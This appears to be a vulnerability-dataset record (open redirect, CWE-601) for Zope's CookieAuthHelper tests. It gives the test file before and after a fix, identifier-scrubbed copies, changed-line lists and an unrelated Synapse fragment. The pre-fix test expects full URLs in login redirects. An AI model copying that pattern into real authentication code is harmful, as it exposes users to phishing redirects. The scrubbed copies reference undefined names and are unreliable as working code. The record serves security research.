from ...tests.conformance import ICredentialsResetPlugin_conformance
from ...tests.conformance import ICredentialsUpdatePlugin_conformance
from ...tests.conformance import ILoginPasswordHostExtractionPlugin_conformance
from ...tests.test_PluggableAuthService import FauxContainer
from ...tests.test_PluggableAuthService import FauxObject
from ...tests.test_PluggableAuthService import FauxRequest
from ...tests.test_PluggableAuthService import FauxResponse
from ...tests.test_PluggableAuthService import FauxRoot
class FauxSettableRequest(FauxRequest):
def set(self, name, value):
self._dict[name] = value
class FauxCookieResponse(FauxResponse):
def __init__(self):
self.cookies = {}
self.redirected = False
self.status = '200'
self.headers = {}
def setCookie(self, cookie_name, cookie_value, path):
self.cookies[(cookie_name, path)] = cookie_value
def expireCookie(self, cookie_name, path):
if (cookie_name, path) in self.cookies:
del self.cookies[(cookie_name, path)]
def redirect(self, location, status=302, lock=0):
self.status = status
self.headers['Location'] = location
def setHeader(self, name, value):
self.headers[name] = value
class CookieAuthHelperTests(unittest.TestCase,
ILoginPasswordHostExtractionPlugin_conformance,
IChallengePlugin_conformance,
ICredentialsResetPlugin_conformance,
ICredentialsUpdatePlugin_conformance):
def _getTargetClass(self):
from ...plugins.CookieAuthHelper import CookieAuthHelper
return CookieAuthHelper
def _makeOne(self, id='test', *args, **kw):
return self._getTargetClass()(id=id, *args, **kw)
def _makeTree(self):
rc = FauxObject('rc')
root = FauxRoot('root').__of__(rc)
folder = FauxContainer('folder').__of__(root)
object = FauxObject('object').__of__(folder)
return rc, root, folder, object
def test_extractCredentials_no_creds(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxRequest(RESPONSE=response)
self.assertEqual(helper.extractCredentials(request), {})
def test_extractCredentials_with_form_creds(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(__ac_name='foo',
__ac_password='b:ar',
RESPONSE=response)
self.assertEqual(len(response.cookies), 0)
self.assertEqual(helper.extractCredentials(request),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
self.assertEqual(len(response.cookies), 0)
def test_extractCredentials_with_deleted_cookie(self):
# http://www.zope.org/Collectors/PAS/43
# Edge case: The ZPublisher sets a cookie's value to "deleted"
# in the current request if expireCookie is called. If we hit
# extractCredentials in the same request after this, it would
# blow up trying to deal with the invalid cookie value.
helper = self._makeOne()
response = FauxCookieResponse()
req_data = {helper.cookie_name: 'deleted', 'RESPONSE': response}
request = FauxSettableRequest(**req_data)
self.assertEqual(len(response.cookies), 0)
self.assertEqual(helper.extractCredentials(request), {})
def test_challenge(self):
rc, root, folder, object = self._makeTree()
response = FauxCookieResponse()
testURL = 'http://test'
request = FauxRequest(RESPONSE=response, URL=testURL,
ACTUAL_URL=testURL)
root.REQUEST = request
helper = self._makeOne().__of__(root)
helper.challenge(request, response)
self.assertEqual(response.status, 302)
self.assertEqual(len(response.headers), 3)
self.assertTrue(response.headers['Location'].endswith(quote(testURL)))
self.assertEqual(response.headers['Cache-Control'], 'no-cache')
self.assertEqual(response.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def test_challenge_with_vhm(self):
rc, root, folder, object = self._makeTree()
response = FauxCookieResponse()
vhm = 'http://localhost/VirtualHostBase/http/test/VirtualHostRoot/xxx'
actualURL = 'http://test/xxx'
request = FauxRequest(RESPONSE=response, URL=vhm,
ACTUAL_URL=actualURL)
root.REQUEST = request
helper = self._makeOne().__of__(root)
helper.challenge(request, response)
self.assertEqual(response.status, 302)
self.assertEqual(len(response.headers), 3)
loc = response.headers['Location']
self.assertTrue(loc.endswith(quote(actualURL)))
self.assertFalse(loc.endswith(quote(vhm)))
self.assertEqual(response.headers['Cache-Control'], 'no-cache')
self.assertEqual(response.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def test_resetCredentials(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxRequest(RESPONSE=response)
helper.resetCredentials(request, response)
self.assertEqual(len(response.cookies), 0)
def test_loginWithoutCredentialsUpdate(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(__ac_name='foo', __ac_password='bar',
RESPONSE=response)
request.form['came_from'] = ''
helper.REQUEST = request
helper.login()
self.assertEqual(len(response.cookies), 0)
def test_extractCredentials_from_cookie_with_colon_in_password(self):
# http://www.zope.org/Collectors/PAS/51
# Passwords with ":" characters broke authentication
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(RESPONSE=response)
username = codecs.encode(b'foo', 'hex_codec')
password = codecs.encode(b'b:ar', 'hex_codec')
cookie_str = b'%s:%s' % (username, password)
cookie_val = encodebytes(cookie_str)
cookie_val = cookie_val.rstrip()
if six.PY3:
cookie_val = cookie_val.decode('utf8')
request.set(helper.cookie_name, cookie_val)
self.assertEqual(helper.extractCredentials(request),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
def test_extractCredentials_from_cookie_with_colon_that_is_not_ours(self):
# http://article.gmane.org/gmane.comp.web.zope.plone.product-developers/5145
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(RESPONSE=response)
cookie_str = b'cookie:from_other_plugin'
cookie_val = encodebytes(cookie_str)
cookie_val = cookie_val.rstrip()
if six.PY3:
cookie_val = cookie_val.decode('utf8')
request.set(helper.cookie_name, cookie_val)
self.assertEqual(helper.extractCredentials(request), {})
def test_extractCredentials_from_cookie_with_bad_binascii(self):
# this might happen between browser implementations
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(RESPONSE=response)
cookie_val = 'NjE2NDZkNjk2ZTo3MDZjNmY2ZTY1MzQ3NQ%3D%3D'[:-1]
request.set(helper.cookie_name, cookie_val)
self.assertEqual(helper.extractCredentials(request), {})
| ##############################################################################
#
# Copyright (c) 2001 Zope Foundation and Contributors
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this
# distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
try:
from base64 import encodebytes
except ImportError: # Python < 3.1
from base64 import encodestring as encodebytes
import codecs
import unittest
import six
from six.moves.urllib.parse import quote
from ...tests.conformance import IChallengePlugin_conformance
from ...tests.conformance import ICredentialsResetPlugin_conformance
from ...tests.conformance import ICredentialsUpdatePlugin_conformance
from ...tests.conformance import ILoginPasswordHostExtractionPlugin_conformance
from ...tests.test_PluggableAuthService import FauxContainer
from ...tests.test_PluggableAuthService import FauxObject
from ...tests.test_PluggableAuthService import FauxRequest
from ...tests.test_PluggableAuthService import FauxResponse
from ...tests.test_PluggableAuthService import FauxRoot
class FauxSettableRequest(FauxRequest):
def set(self, name, value):
self._dict[name] = value
class FauxCookieResponse(FauxResponse):
def __init__(self):
self.cookies = {}
self.redirected = False
self.status = '200'
self.headers = {}
def setCookie(self, cookie_name, cookie_value, path):
self.cookies[(cookie_name, path)] = cookie_value
def expireCookie(self, cookie_name, path):
if (cookie_name, path) in self.cookies:
del self.cookies[(cookie_name, path)]
def redirect(self, location, status=302, lock=0):
self.status = status
self.headers['Location'] = location
def setHeader(self, name, value):
self.headers[name] = value
class CookieAuthHelperTests(unittest.TestCase,
ILoginPasswordHostExtractionPlugin_conformance,
IChallengePlugin_conformance,
ICredentialsResetPlugin_conformance,
ICredentialsUpdatePlugin_conformance):
def _getTargetClass(self):
from ...plugins.CookieAuthHelper import CookieAuthHelper
return CookieAuthHelper
def _makeOne(self, id='test', *args, **kw):
return self._getTargetClass()(id=id, *args, **kw)
def _makeTree(self):
rc = FauxObject('rc')
root = FauxRoot('root').__of__(rc)
folder = FauxContainer('folder').__of__(root)
object = FauxObject('object').__of__(folder)
return rc, root, folder, object
def test_extractCredentials_no_creds(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxRequest(RESPONSE=response)
self.assertEqual(helper.extractCredentials(request), {})
def test_extractCredentials_with_form_creds(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(__ac_name='foo',
__ac_password='b:ar',
RESPONSE=response)
self.assertEqual(len(response.cookies), 0)
self.assertEqual(helper.extractCredentials(request),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
self.assertEqual(len(response.cookies), 0)
def test_extractCredentials_with_deleted_cookie(self):
# http://www.zope.org/Collectors/PAS/43
# Edge case: The ZPublisher sets a cookie's value to "deleted"
# in the current request if expireCookie is called. If we hit
# extractCredentials in the same request after this, it would
# blow up trying to deal with the invalid cookie value.
helper = self._makeOne()
response = FauxCookieResponse()
req_data = {helper.cookie_name: 'deleted', 'RESPONSE': response}
request = FauxSettableRequest(**req_data)
self.assertEqual(len(response.cookies), 0)
self.assertEqual(helper.extractCredentials(request), {})
def test_challenge(self):
rc, root, folder, object = self._makeTree()
response = FauxCookieResponse()
testPath = '/some/path'
testURL = 'http://test' + testPath
request = FauxRequest(RESPONSE=response, URL=testURL,
ACTUAL_URL=testURL)
root.REQUEST = request
helper = self._makeOne().__of__(root)
helper.challenge(request, response)
self.assertEqual(response.status, 302)
self.assertEqual(len(response.headers), 3)
loc = response.headers['Location']
self.assertTrue(loc.endswith(quote(testPath)))
self.assertNotIn(testURL, loc)
self.assertEqual(response.headers['Cache-Control'], 'no-cache')
self.assertEqual(response.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def test_challenge_with_vhm(self):
rc, root, folder, object = self._makeTree()
response = FauxCookieResponse()
vhm = 'http://localhost/VirtualHostBase/http/test/VirtualHostRoot/xxx'
actualURL = 'http://test/xxx'
request = FauxRequest(RESPONSE=response, URL=vhm,
ACTUAL_URL=actualURL)
root.REQUEST = request
helper = self._makeOne().__of__(root)
helper.challenge(request, response)
self.assertEqual(response.status, 302)
self.assertEqual(len(response.headers), 3)
loc = response.headers['Location']
self.assertTrue(loc.endswith(quote('/xxx')))
self.assertFalse(loc.endswith(quote(vhm)))
self.assertNotIn(actualURL, loc)
self.assertEqual(response.headers['Cache-Control'], 'no-cache')
self.assertEqual(response.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def test_resetCredentials(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxRequest(RESPONSE=response)
helper.resetCredentials(request, response)
self.assertEqual(len(response.cookies), 0)
def test_loginWithoutCredentialsUpdate(self):
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(__ac_name='foo', __ac_password='bar',
RESPONSE=response)
request.form['came_from'] = ''
helper.REQUEST = request
helper.login()
self.assertEqual(len(response.cookies), 0)
def test_extractCredentials_from_cookie_with_colon_in_password(self):
# http://www.zope.org/Collectors/PAS/51
# Passwords with ":" characters broke authentication
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(RESPONSE=response)
username = codecs.encode(b'foo', 'hex_codec')
password = codecs.encode(b'b:ar', 'hex_codec')
cookie_str = b'%s:%s' % (username, password)
cookie_val = encodebytes(cookie_str)
cookie_val = cookie_val.rstrip()
if six.PY3:
cookie_val = cookie_val.decode('utf8')
request.set(helper.cookie_name, cookie_val)
self.assertEqual(helper.extractCredentials(request),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
def test_extractCredentials_from_cookie_with_colon_that_is_not_ours(self):
# http://article.gmane.org/gmane.comp.web.zope.plone.product-developers/5145
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(RESPONSE=response)
cookie_str = b'cookie:from_other_plugin'
cookie_val = encodebytes(cookie_str)
cookie_val = cookie_val.rstrip()
if six.PY3:
cookie_val = cookie_val.decode('utf8')
request.set(helper.cookie_name, cookie_val)
self.assertEqual(helper.extractCredentials(request), {})
def test_extractCredentials_from_cookie_with_bad_binascii(self):
# this might happen between browser implementations
helper = self._makeOne()
response = FauxCookieResponse()
request = FauxSettableRequest(RESPONSE=response)
cookie_val = 'NjE2NDZkNjk2ZTo3MDZjNmY2ZTY1MzQ3NQ%3D%3D'[:-1]
request.set(helper.cookie_name, cookie_val)
self.assertEqual(helper.extractCredentials(request), {})
| open_redirect | {
"code": [
" testURL = 'http://test'",
" self.assertTrue(response.headers['Location'].endswith(quote(testURL)))",
" self.assertTrue(loc.endswith(quote(actualURL)))"
],
"line_no": [
131,
141,
162
]
} | {
"code": [
" testPath = '/some/path'",
" testURL = 'http://test' + testPath",
" loc = response.headers['Location']",
" self.assertTrue(loc.endswith(quote(testPath)))",
" self.assertNotIn(testURL, loc)",
" self.assertTrue(loc.endswith(quote('/xxx')))"
],
"line_no": [
131,
132,
142,
143,
144,
165
]
} |
try:
from base64 import encodebytes
except ImportError: # Python < 3.1
from base64 import encodestring as encodebytes
import codecs
import unittest
import six
from six.moves.urllib.parse import quote
from ...tests.conformance import IChallengePlugin_conformance
from ...tests.conformance import ICredentialsResetPlugin_conformance
from ...tests.conformance import ICredentialsUpdatePlugin_conformance
from ...tests.conformance import ILoginPasswordHostExtractionPlugin_conformance
from ...tests.test_PluggableAuthService import FauxContainer
from ...tests.test_PluggableAuthService import FauxObject
from ...tests.test_PluggableAuthService import FauxRequest
from ...tests.test_PluggableAuthService import FauxResponse
from ...tests.test_PluggableAuthService import FauxRoot
class CLASS_0(FauxRequest):
def FUNC_0(self, VAR_0, VAR_1):
self._dict[VAR_0] = VAR_1
class CLASS_1(FauxResponse):
def __init__(self):
self.cookies = {}
self.redirected = False
self.status = '200'
self.headers = {}
def FUNC_1(self, VAR_2, VAR_3, VAR_4):
self.cookies[(VAR_2, VAR_4)] = VAR_3
def FUNC_2(self, VAR_2, VAR_4):
if (VAR_2, VAR_4) in self.cookies:
del self.cookies[(VAR_2, VAR_4)]
def FUNC_3(self, VAR_5, VAR_6=302, VAR_7=0):
self.status = VAR_6
self.headers['Location'] = VAR_5
def FUNC_4(self, VAR_0, VAR_1):
self.headers[VAR_0] = VAR_1
class CLASS_2(unittest.TestCase,
ILoginPasswordHostExtractionPlugin_conformance,
IChallengePlugin_conformance,
ICredentialsResetPlugin_conformance,
ICredentialsUpdatePlugin_conformance):
def FUNC_5(self):
from ...plugins.CookieAuthHelper import CookieAuthHelper
return CookieAuthHelper
def FUNC_6(self, VAR_8='test', *VAR_9, **VAR_10):
return self._getTargetClass()(VAR_8=id, *VAR_9, **VAR_10)
def FUNC_7(self):
VAR_11 = FauxObject('rc')
VAR_12 = FauxRoot('root').__of__(VAR_11)
VAR_13 = FauxContainer('folder').__of__(VAR_12)
VAR_14 = FauxObject('object').__of__(VAR_13)
return VAR_11, VAR_12, VAR_13, VAR_14
def FUNC_8(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = FauxRequest(RESPONSE=VAR_16)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
def FUNC_9(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(__ac_name='foo',
__ac_password='b:ar',
RESPONSE=VAR_16)
self.assertEqual(len(VAR_16.cookies), 0)
self.assertEqual(VAR_15.extractCredentials(VAR_17),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
self.assertEqual(len(VAR_16.cookies), 0)
def FUNC_10(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_18 = {VAR_15.cookie_name: 'deleted', 'RESPONSE': VAR_16}
VAR_17 = CLASS_0(**VAR_18)
self.assertEqual(len(VAR_16.cookies), 0)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
def FUNC_11(self):
VAR_11, VAR_12, VAR_13, VAR_14 = self._makeTree()
VAR_16 = CLASS_1()
VAR_19 = 'http://test'
VAR_17 = FauxRequest(RESPONSE=VAR_16, URL=VAR_19,
ACTUAL_URL=VAR_19)
VAR_12.REQUEST = VAR_17
VAR_15 = self._makeOne().__of__(VAR_12)
VAR_15.challenge(VAR_17, VAR_16)
self.assertEqual(VAR_16.status, 302)
self.assertEqual(len(VAR_16.headers), 3)
self.assertTrue(VAR_16.headers['Location'].endswith(quote(VAR_19)))
self.assertEqual(VAR_16.headers['Cache-Control'], 'no-cache')
self.assertEqual(VAR_16.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def FUNC_12(self):
VAR_11, VAR_12, VAR_13, VAR_14 = self._makeTree()
VAR_16 = CLASS_1()
VAR_20 = 'http://localhost/VirtualHostBase/http/test/VirtualHostRoot/xxx'
VAR_21 = 'http://test/xxx'
VAR_17 = FauxRequest(RESPONSE=VAR_16, URL=VAR_20,
ACTUAL_URL=VAR_21)
VAR_12.REQUEST = VAR_17
VAR_15 = self._makeOne().__of__(VAR_12)
VAR_15.challenge(VAR_17, VAR_16)
self.assertEqual(VAR_16.status, 302)
self.assertEqual(len(VAR_16.headers), 3)
VAR_22 = VAR_16.headers['Location']
self.assertTrue(VAR_22.endswith(quote(VAR_21)))
self.assertFalse(VAR_22.endswith(quote(VAR_20)))
self.assertEqual(VAR_16.headers['Cache-Control'], 'no-cache')
self.assertEqual(VAR_16.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def FUNC_13(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = FauxRequest(RESPONSE=VAR_16)
VAR_15.resetCredentials(VAR_17, VAR_16)
self.assertEqual(len(VAR_16.cookies), 0)
def FUNC_14(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(__ac_name='foo', __ac_password='bar',
RESPONSE=VAR_16)
VAR_17.form['came_from'] = ''
VAR_15.REQUEST = VAR_17
VAR_15.login()
self.assertEqual(len(VAR_16.cookies), 0)
def FUNC_15(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(RESPONSE=VAR_16)
VAR_23 = codecs.encode(b'foo', 'hex_codec')
VAR_24 = codecs.encode(b'b:ar', 'hex_codec')
VAR_25 = b'%s:%s' % (VAR_23, VAR_24)
VAR_26 = encodebytes(VAR_25)
VAR_26 = cookie_val.rstrip()
if six.PY3:
VAR_26 = cookie_val.decode('utf8')
VAR_17.set(VAR_15.cookie_name, VAR_26)
self.assertEqual(VAR_15.extractCredentials(VAR_17),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
def FUNC_16(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(RESPONSE=VAR_16)
VAR_25 = b'cookie:from_other_plugin'
VAR_26 = encodebytes(VAR_25)
VAR_26 = cookie_val.rstrip()
if six.PY3:
VAR_26 = cookie_val.decode('utf8')
VAR_17.set(VAR_15.cookie_name, VAR_26)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
def FUNC_17(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(RESPONSE=VAR_16)
VAR_26 = 'NjE2NDZkNjk2ZTo3MDZjNmY2ZTY1MzQ3NQ%3D%3D'[:-1]
VAR_17.set(VAR_15.cookie_name, VAR_26)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
|
try:
from base64 import encodebytes
except ImportError: # Python < 3.1
from base64 import encodestring as encodebytes
import codecs
import unittest
import six
from six.moves.urllib.parse import quote
from ...tests.conformance import IChallengePlugin_conformance
from ...tests.conformance import ICredentialsResetPlugin_conformance
from ...tests.conformance import ICredentialsUpdatePlugin_conformance
from ...tests.conformance import ILoginPasswordHostExtractionPlugin_conformance
from ...tests.test_PluggableAuthService import FauxContainer
from ...tests.test_PluggableAuthService import FauxObject
from ...tests.test_PluggableAuthService import FauxRequest
from ...tests.test_PluggableAuthService import FauxResponse
from ...tests.test_PluggableAuthService import FauxRoot
class CLASS_0(FauxRequest):
def FUNC_0(self, VAR_0, VAR_1):
self._dict[VAR_0] = VAR_1
class CLASS_1(FauxResponse):
def __init__(self):
self.cookies = {}
self.redirected = False
self.status = '200'
self.headers = {}
def FUNC_1(self, VAR_2, VAR_3, VAR_4):
self.cookies[(VAR_2, VAR_4)] = VAR_3
def FUNC_2(self, VAR_2, VAR_4):
if (VAR_2, VAR_4) in self.cookies:
del self.cookies[(VAR_2, VAR_4)]
def FUNC_3(self, VAR_5, VAR_6=302, VAR_7=0):
self.status = VAR_6
self.headers['Location'] = VAR_5
def FUNC_4(self, VAR_0, VAR_1):
self.headers[VAR_0] = VAR_1
class CLASS_2(unittest.TestCase,
ILoginPasswordHostExtractionPlugin_conformance,
IChallengePlugin_conformance,
ICredentialsResetPlugin_conformance,
ICredentialsUpdatePlugin_conformance):
def FUNC_5(self):
from ...plugins.CookieAuthHelper import CookieAuthHelper
return CookieAuthHelper
def FUNC_6(self, VAR_8='test', *VAR_9, **VAR_10):
return self._getTargetClass()(VAR_8=id, *VAR_9, **VAR_10)
def FUNC_7(self):
VAR_11 = FauxObject('rc')
VAR_12 = FauxRoot('root').__of__(VAR_11)
VAR_13 = FauxContainer('folder').__of__(VAR_12)
VAR_14 = FauxObject('object').__of__(VAR_13)
return VAR_11, VAR_12, VAR_13, VAR_14
def FUNC_8(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = FauxRequest(RESPONSE=VAR_16)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
def FUNC_9(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(__ac_name='foo',
__ac_password='b:ar',
RESPONSE=VAR_16)
self.assertEqual(len(VAR_16.cookies), 0)
self.assertEqual(VAR_15.extractCredentials(VAR_17),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
self.assertEqual(len(VAR_16.cookies), 0)
def FUNC_10(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_18 = {VAR_15.cookie_name: 'deleted', 'RESPONSE': VAR_16}
VAR_17 = CLASS_0(**VAR_18)
self.assertEqual(len(VAR_16.cookies), 0)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
def FUNC_11(self):
VAR_11, VAR_12, VAR_13, VAR_14 = self._makeTree()
VAR_16 = CLASS_1()
VAR_19 = '/some/path'
VAR_20 = 'http://test' + VAR_19
VAR_17 = FauxRequest(RESPONSE=VAR_16, URL=VAR_20,
ACTUAL_URL=VAR_20)
VAR_12.REQUEST = VAR_17
VAR_15 = self._makeOne().__of__(VAR_12)
VAR_15.challenge(VAR_17, VAR_16)
self.assertEqual(VAR_16.status, 302)
self.assertEqual(len(VAR_16.headers), 3)
VAR_21 = VAR_16.headers['Location']
self.assertTrue(VAR_21.endswith(quote(VAR_19)))
self.assertNotIn(VAR_20, VAR_21)
self.assertEqual(VAR_16.headers['Cache-Control'], 'no-cache')
self.assertEqual(VAR_16.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def FUNC_12(self):
VAR_11, VAR_12, VAR_13, VAR_14 = self._makeTree()
VAR_16 = CLASS_1()
VAR_22 = 'http://localhost/VirtualHostBase/http/test/VirtualHostRoot/xxx'
VAR_23 = 'http://test/xxx'
VAR_17 = FauxRequest(RESPONSE=VAR_16, URL=VAR_22,
ACTUAL_URL=VAR_23)
VAR_12.REQUEST = VAR_17
VAR_15 = self._makeOne().__of__(VAR_12)
VAR_15.challenge(VAR_17, VAR_16)
self.assertEqual(VAR_16.status, 302)
self.assertEqual(len(VAR_16.headers), 3)
VAR_21 = VAR_16.headers['Location']
self.assertTrue(VAR_21.endswith(quote('/xxx')))
self.assertFalse(VAR_21.endswith(quote(VAR_22)))
self.assertNotIn(VAR_23, VAR_21)
self.assertEqual(VAR_16.headers['Cache-Control'], 'no-cache')
self.assertEqual(VAR_16.headers['Expires'],
'Sat, 01 Jan 2000 00:00:00 GMT')
def FUNC_13(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = FauxRequest(RESPONSE=VAR_16)
VAR_15.resetCredentials(VAR_17, VAR_16)
self.assertEqual(len(VAR_16.cookies), 0)
def FUNC_14(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(__ac_name='foo', __ac_password='bar',
RESPONSE=VAR_16)
VAR_17.form['came_from'] = ''
VAR_15.REQUEST = VAR_17
VAR_15.login()
self.assertEqual(len(VAR_16.cookies), 0)
def FUNC_15(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(RESPONSE=VAR_16)
VAR_24 = codecs.encode(b'foo', 'hex_codec')
VAR_25 = codecs.encode(b'b:ar', 'hex_codec')
VAR_26 = b'%s:%s' % (VAR_24, VAR_25)
VAR_27 = encodebytes(VAR_26)
VAR_27 = cookie_val.rstrip()
if six.PY3:
VAR_27 = cookie_val.decode('utf8')
VAR_17.set(VAR_15.cookie_name, VAR_27)
self.assertEqual(VAR_15.extractCredentials(VAR_17),
{'login': 'foo',
'password': 'b:ar',
'remote_host': '',
'remote_address': ''})
def FUNC_16(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(RESPONSE=VAR_16)
VAR_26 = b'cookie:from_other_plugin'
VAR_27 = encodebytes(VAR_26)
VAR_27 = cookie_val.rstrip()
if six.PY3:
VAR_27 = cookie_val.decode('utf8')
VAR_17.set(VAR_15.cookie_name, VAR_27)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
def FUNC_17(self):
VAR_15 = self._makeOne()
VAR_16 = CLASS_1()
VAR_17 = CLASS_0(RESPONSE=VAR_16)
VAR_27 = 'NjE2NDZkNjk2ZTo3MDZjNmY2ZTY1MzQ3NQ%3D%3D'[:-1]
VAR_17.set(VAR_15.cookie_name, VAR_27)
self.assertEqual(VAR_15.extractCredentials(VAR_17), {})
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
18,
21,
24,
34,
35,
37,
40,
41,
43,
49,
52,
56,
60,
63,
64,
70,
72,
74,
76,
78,
80,
82,
87,
89,
91,
95,
97,
99,
105,
113,
115,
116,
117,
118,
119,
125,
127,
135,
137,
145,
151,
155,
157,
167,
172,
175,
183,
186,
188,
189,
193,
202,
208,
210,
214,
221,
223,
225,
229,
232,
234
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
18,
21,
24,
34,
35,
37,
40,
41,
43,
49,
52,
56,
60,
63,
64,
70,
72,
74,
76,
78,
80,
82,
87,
89,
91,
95,
97,
99,
105,
113,
115,
116,
117,
118,
119,
125,
127,
136,
138,
148,
154,
158,
160,
171,
176,
179,
187,
190,
192,
193,
197,
206,
212,
214,
218,
225,
227,
229,
233,
236,
238
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017-2018 New Vector Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains handlers for federation events."""
import itertools
import logging
from collections.abc import Container
from http import HTTPStatus
from typing import TYPE_CHECKING, Dict, Iterable, List, Optional, Sequence, Tuple, Union
import attr
from signedjson.key import decode_verify_key_bytes
from signedjson.sign import verify_signed_json
from unpaddedbase64 import decode_base64
from twisted.internet import defer
from synapse import event_auth
from synapse.api.constants import (
EventTypes,
Membership,
RejectedReason,
RoomEncryptionAlgorithms,
)
from synapse.api.errors import (
AuthError,
CodeMessageException,
Codes,
FederationDeniedError,
FederationError,
HttpResponseException,
NotFoundError,
RequestSendFailed,
SynapseError,
)
from synapse.api.room_versions import KNOWN_ROOM_VERSIONS, RoomVersion, RoomVersions
from synapse.crypto.event_signing import compute_event_signature
from synapse.event_auth import auth_types_for_event
from synapse.events import EventBase
from synapse.events.snapshot import EventContext
from synapse.events.validator import EventValidator
from synapse.handlers._base import BaseHandler
from synapse.http.servlet import assert_params_in_dict
from synapse.logging.context import (
make_deferred_yieldable,
nested_logging_context,
preserve_fn,
run_in_background,
)
from synapse.logging.utils import log_function
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.replication.http.devices import ReplicationUserDevicesResyncRestServlet
from synapse.replication.http.federation import (
ReplicationCleanRoomRestServlet,
ReplicationFederationSendEventsRestServlet,
ReplicationStoreRoomOnOutlierMembershipRestServlet,
)
from synapse.state import StateResolutionStore
from synapse.storage.databases.main.events_worker import EventRedactBehaviour
from synapse.types import (
JsonDict,
MutableStateMap,
PersistedEventPosition,
RoomStreamToken,
StateMap,
UserID,
get_domain_from_id,
)
from synapse.util.async_helpers import Linearizer, concurrently_execute
from synapse.util.retryutils import NotRetryingDestination
from synapse.util.stringutils import shortstr
from synapse.visibility import filter_events_for_server
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
@attr.s(slots=True)
class _NewEventInfo:
"""Holds information about a received event, ready for passing to _handle_new_events
Attributes:
event: the received event
state: the state at that event
auth_events: the auth_event map for that event
"""
event = attr.ib(type=EventBase)
state = attr.ib(type=Optional[Sequence[EventBase]], default=None)
auth_events = attr.ib(type=Optional[MutableStateMap[EventBase]], default=None)
class FederationHandler(BaseHandler):
"""Handles events that originated from federation.
Responsible for:
a) handling received Pdus before handing them on as Events to the rest
of the homeserver (including auth and state conflict resolutions)
b) converting events that were produced by local clients that may need
to be sent to remote homeservers.
c) doing the necessary dances to invite remote users and join remote
rooms.
"""
def __init__(self, hs: "HomeServer"):
